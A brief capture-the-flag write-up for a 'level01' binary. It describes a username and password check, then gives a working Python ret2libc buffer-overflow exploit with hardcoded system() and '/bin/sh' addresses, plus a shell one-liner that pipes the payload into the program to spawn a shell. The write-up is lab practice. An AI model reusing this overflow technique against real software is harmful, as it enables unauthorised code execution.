* In this level01 the program asks for a username , store it in a global variable/buffer called a_user_name 
* call verify_user_name() to check using strncmp() if the username is equal to "dat_wil".
* if the username is dat_wil the program asks for a password , else it return (1).
* the password is stored on the buffer[64], and get passed to verify_user_pass(), this function compare if the password is equal to "admin" , and return accordingly.
* wethere if we provide a correct password or not the program throw the msg "nope, incorrect password...\n", and return .
*  


----------------------------------------------------------------
import struct

padding = "A" * 80


system = struct.pack ("I", 0xf7e6aed0)

return_after_system = "AAAA"

bin_sh = struct.pack ("I", 0xf7f897ec)

print padding + system + return_after_system + bin_sh
-------------------------------------------------------------------

====> (echo $(python -c 'print "dat_wil"'); sleep 1; python /tmp/lev1.py ; cat) | ./level01